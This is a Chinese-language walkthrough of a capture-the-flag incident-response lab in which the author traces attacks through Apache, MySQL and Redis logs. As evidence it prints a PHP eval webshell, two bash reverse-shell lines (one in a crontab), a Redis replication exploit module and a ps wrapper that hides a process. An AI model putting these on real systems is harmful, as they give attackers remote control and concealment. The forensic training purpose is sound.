玄機應急響應-第二章

日誌分析-apache日誌分析

一,提交當天訪問次數最多的IP，即駭客IP：

      1
     29 ::1
   6555 192.168.200.2
      1 192.168.200.211
      5 192.168.200.38
      1 192.168.200.48

$ cat access.log.1|awk -F ' ' '{print $1}'|sort|uniq -c

flag{192.168.200.2}

二,駭客使用的瀏覽器指紋是什麼，提交指紋的md5：

     12 "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
   6543 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"

$ cat access.log.1|grep -w '192.168.200.2'|awk -F '" ' '{print $3}'|uniq -c

flag{2D6330F380F44AC20F3A02EED0958F66}

三,檢視index.php頁面被訪問的次數，提交次數：

27

$ cat access.log.1|grep '/index\.php'|wc -l

flag{27}

四,檢視駭客IP訪問了多少次，提交次數：

6555

$ cat access.log.1|grep -w '192.168.200.2'|wc -l

flag{6555}

五,檢視2023年8月03日8時這一個小時內有多少IP訪問，提交次數:

5

$ cat access.log.1|grep '03/Aug/2023:08:'|awk '{print $1}'|sort|uniq|wc -l

flag{5}

日誌分析-mysql應急響應

一,駭客第一次寫入的shell flag

1       2       <?php @eval($_POST['a']);?>     4
//ccfda79e-7aa1-4275-bc26-a6189eb9a20b

$ cat /var/www/html/sh.php

flag{ccfda79e-7aa1-4275-bc26-a6189eb9a20b}

二,駭客反彈shell的ip flag

bash -i >&/dev/tcp/192.168.100.13/777 0>&1

$ cat /tmp/1.sh

flag{}

三,駭客提權檔案的完整路徑 md5 flag{md5} 注 /xxx/xxx/xxx/xxx/xxx.xx

hacker利用udf提權,udf提權要具備兩個條件 1. 能夠連上mysql 2.mysql的secure_file_priv為空,即能夠寫入檔案

root@xuanji:/var/www/html# cat common.php
<?php
$conn=mysqli_connect("localhost","root","334cc35b3c704593","cms","3306");
if(!$conn){
echo "資料庫連線失敗";
}

$ cat /var/www/html/common.php

獲得mysql資訊

+------------------+-------+
| Variable_name    | Value |
+------------------+-------+
| secure_auth      | OFF   |
| secure_file_priv |       |
+------------------+-------+
2 rows in set (0.00 sec)

MariaDB [cms]> show global variables like '%secure%';

+-----------------+------------------------+
| Variable_name   | Value                  |
+-----------------+------------------------+
| plugin_dir      | /usr/lib/mysql/plugin/ |
| plugin_maturity | unknown                |
+-----------------+------------------------+
2 rows in set (0.00 sec)

MariaDB [cms]> show variables like '%plugin%';

確認能夠透過udf提權,udf提權會在/usr/lib/mysql/plugin下留下痕跡

1       2       <?php @eval($_POST['a']);?>     4

$ cat /usr/lib/mysql/plugin/udf.so

flag{b1818bde4e310f3d23f1005185b973e7}

四,駭客獲取的許可權 flag

USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.4  52172 16788 ?        Ss   04:17   0:00 /usr/bin/python /usr/bin/supervisord -n
root           8  0.0  0.0  18196  3224 ?        S    04:17   0:00 /bin/bash /usr/bin/mysqld_safe
root           9  0.0  0.1  61396  5400 ?        S    04:17   0:00 /usr/sbin/sshd -D
mysql        363  0.0  1.6 619976 64600 ?        Sl   04:17   0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=m
root         385  0.0  0.6 313056 24688 ?        S    04:17   0:00 /usr/sbin/apache2 -DFOREGROUND
www-data     387  0.0  0.1 313080  7788 ?        S    04:17   0:00 /usr/sbin/apache2 -DFOREGROUND
www-data     388  0.0  0.1 313080  7788 ?        S    04:17   0:00 /usr/sbin/apache2 -DFOREGROUND
www-data     389  0.0  0.1 313080  7788 ?        S    04:17   0:00 /usr/sbin/apache2 -DFOREGROUND
www-data     390  0.0  0.1 313080  7788 ?        S    04:17   0:00 /usr/sbin/apache2 -DFOREGROUND
www-data     391  0.0  0.1 313080  7788 ?        S    04:17   0:00 /usr/sbin/apache2 -DFOREGROUND
root         393  0.0  0.1  92560  6156 ?        Rs   04:17   0:00 sshd: root@pts/0
root         404  0.0  0.0  18204  3400 pts/0    Ss   04:17   0:00 -bash
root         469  0.0  0.0  15584  2116 pts/0    R+   04:32   0:00 ps aux

$ ps aux

flag{mysql}

日誌分析-redis應急響應

一,透過本地 PC SSH到伺服器並且分析駭客攻擊成功的 IP 為多少,將駭客 IP 作為 FLAG 提交;

     48 192.168.100.13:8888
      2 192.168.100.20:8888
      1 192.168.31.55:8888

$ cat redis.log|grep 'Connecting'|awk -F ' ' '{print $10}'|sort|uniq -c

檢視連線成功的ip,逐個排查

419:S 31 Jul 2023 05:34:03.034 * REPLICAOF 192.168.31.55:8888 enabled (user request from 'id=5 addr=192.168.200.2:64319 fd=7 name= age=0 idle=0 flags=N db=0 sub=0 psub=0 multi=-1 qbuf=47 qbuf-free=32721 obl=0 oll=0 omem=0 events=r cmd=slaveof')
419:S 31 Jul 2023 05:34:03.722 * Connecting to MASTER 192.168.31.55:8888
419:S 31 Jul 2023 05:34:03.722 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:34:33.173 * REPLICAOF 192.168.100.20:8888 enabled (user request from 'id=6 addr=192.168.200.2:64339 fd=7 name= age=0 idle=0 flags=N db=0 sub=0 psub=0 multi=-1 qbuf=48 qbuf-free=32720 obl=0 oll=0 omem=0 events=r cmd=slaveof')
419:S 31 Jul 2023 05:34:33.786 * Connecting to MASTER 192.168.100.20:8888
419:S 31 Jul 2023 05:34:33.786 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:34:33.788 * Non blocking connect for SYNC fired the event.
419:S 31 Jul 2023 05:34:35.192 * Master replied to PING, replication can continue...
--
419:S 31 Jul 2023 05:34:35.197 * MASTER <-> REPLICA sync: Loading DB in memory
419:S 31 Jul 2023 05:34:35.197 # Wrong signature trying to load DB from file
419:S 31 Jul 2023 05:34:35.197 # Failed trying to load the MASTER synchronization DB from disk
419:S 31 Jul 2023 05:34:35.791 * Connecting to MASTER 192.168.100.20:8888
419:S 31 Jul 2023 05:34:35.791 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:34:35.792 * Non blocking connect for SYNC fired the event.
419:S 31 Jul 2023 05:34:37.205 * Module 'system' loaded from ./exp.so

$ cat redis.log|grep -w '192.168.100.20:8888' -C 3

其中存在Master replied to PING, replication can continue...表示主從複製成功

flag{192.168.100.20}

二,透過本地 PC SSH到伺服器並且分析駭客第一次上傳的惡意檔案,將駭客上傳的惡意檔案裡面的 FLAG 提交;

...
419:S 31 Jul 2023 05:34:35.197 * MASTER <-> REPLICA sync: Loading DB in memory
419:S 31 Jul 2023 05:34:35.197 # Wrong signature trying to load DB from file
419:S 31 Jul 2023 05:34:35.197 # Failed trying to load the MASTER synchronization DB from disk
419:S 31 Jul 2023 05:34:35.791 * Connecting to MASTER 192.168.100.20:8888
419:S 31 Jul 2023 05:34:35.791 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:34:35.792 * Non blocking connect for SYNC fired the event.
419:S 31 Jul 2023 05:34:37.205 * Module 'system' loaded from ./exp.so

$ cat redis.log|grep -w '192.168.100.20:8888' -C 3

發現有個exp.so檔案被載入

/exp.so

$ find / -name 'exp.so' 2>/dev/null

flag{XJ_78f012d7-42fc-49a8-8a8c-e74c87ea109b}
_flags2
_flags

$ strings /exp.so | grep 'flag'

flag{XJ_78f012d7-42fc-49a8-8a8c-e74c87ea109b}

三,透過本地 PC SSH到伺服器並且分析駭客反彈 shell 的IP 為多少,將反彈 shell 的IP 作為 FLAG 提交;

# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').
#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
#
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
#
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
#
# For more information see the manual pages of crontab(5) and cron(8)
#
*/1 * * * *  /bin/sh -i >& /dev/tcp/192.168.100.13/7777 0>&1
# m h  dom mon dow   command

$ crontab -l

flag{192.168.100.13}

四,透過本地 PC SSH到伺服器並且溯源分析駭客的使用者名稱，並且找到駭客使用的工具裡的關鍵字串(flag{駭客的使用者-關鍵字串} 注關鍵字串 xxx-xxx-xxx)。將使用者名稱和關鍵字串作為 FLAG提交

REDIS0009�      redis-ver5.0.1�
�edis-bits�@�ctime�tO�dused-mem�XU
 aof-preamble���xxsshB9

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDDh4OEFvyb4ubM7YPvzG/FfO6jE4PjLdmuCUdGP+aeLeJB5SXYT6zHkU9wlfY/Fo4UuBlhTqBaS6Ih/Wf62KepzrMsTQQYcSG/Xp8lgFzVCCFAk7apzxfRCPNk1pxaGiEF6MPoCmUu1UhC3ta3xyh2c4KZls0hyFN9JZsuD+siT8KVqm856vQ+RaTrZi3ThMa5gbeH+v3ZUcO35ZfMKor/uWXffHT0Yi06dsgIMN3faIiBrd1Lg0B5kOTaDq3fHs8Qs7pvR9C4ZTm2AK/Oct8ULdsnfS2YWtrYyC8rzNip9Wf083ZY1B4bj1UoxD+QwgThh5VP3xgRd9KDSzEYIBabstGh8GU5zDxr0zIuhQM35I0aALvojXl4QaaEnZwpqU3ZkojPG2aNC0QdiBK7eKwA38Gk+V8DEWc/TTkO+wm3aXYdll5sPmoWTAonaln1nmCiTDn4jKb73DxYHfSgNIDpJ6fS5kbWL5UJnElWCrxzaXKHUlqXJj3x81Oz6baFNv8= xj-test-user

�<#5M

cat ~/.ssh/authorized_keys

得到使用者名稱xj-test-user

透過github搜尋得到flag

flag{xj-test-user-wow-you-find-flag}

五,透過本地 PC SSH到伺服器並且分析駭客篡改的命令,將駭客篡改的命令裡面的關鍵字串作為 FLAG 提交;

...
-rwxr-xr-x 1 root root    919K Nov 13  2022 grub-fstest
-rwxr-xr-x 1 root root     91K Oct  8  2022 rpcgen
-rwxr-xr-x 1 root root     96K Apr 15  2022 gzip
-rwxr-xr-x 1 root root    980K Nov 13  2022 grub-mkrescue
-rwxr-xr-x 2 root root    2.3K Apr 15  2022 gunzip
-rwxr-xr-x 2 root root    2.3K Apr 15  2022 uncompress
-rwxr-xr-x 2 root root    4.7M Oct 31  2022 python3.7
-rwxr-xr-x 2 root root    4.7M Oct 31  2022 python3.7m
lrwxrwxrwx 1 root root      20 Jul 31  2023 cc -> /etc/alternatives/cc
lrwxrwxrwx 1 root root      21 Jul 31  2023 c89 -> /etc/alternatives/c89
lrwxrwxrwx 1 root root      21 Jul 31  2023 c99 -> /etc/alternatives/c99
lrwxrwxrwx 1 root root      25 Jul 31  2023 aclocal -> /etc/alternatives/aclocal
lrwxrwxrwx 1 root root      26 Jul 31  2023 automake -> /etc/alternatives/automake
-rwxrwxrwx 1 root root     178 Jul 31  2023 ps
-rwxr-xr-x 1 root root     10M Jun 29  2023 ssm-session-logger
-rwxr-xr-x 1 root root    131K Jul 31  2023 ps_
-rwxr-xr-x 1 root root     14M Jun 29  2023 amazon-ssm-agent
-rwxr-xr-x 1 root root     18M Jun 29  2023 ssm-session-worker
-rwxr-xr-x 1 root root     19M Jun 29  2023 ssm-cli
-rwxr-xr-x 1 root root     22M Jun 29  2023 ssm-document-worker
-rwxr-xr-x 1 root root     23M Jun 29  2023 ssm-agent-worker

$ ls -lh /usr/bin|sort -nk 8

發現有ps和ps_

#/bin/bash
oldifs="$IFS"
IFS='\$n'
result=$(ps_ $1 $2 $3|grep -v 'threadd' )
for v in $result;
do
        echo -e "$v\t";
done
IFS="$oldifs"
#//c195i2923381905517d818e313792d196

$ cat ps

flag{c195i2923381905517d818e313792d196}